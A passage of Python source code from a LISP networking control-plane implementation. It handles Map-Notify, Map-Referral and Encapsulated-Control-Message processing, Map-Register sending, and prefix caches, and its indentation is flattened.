if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
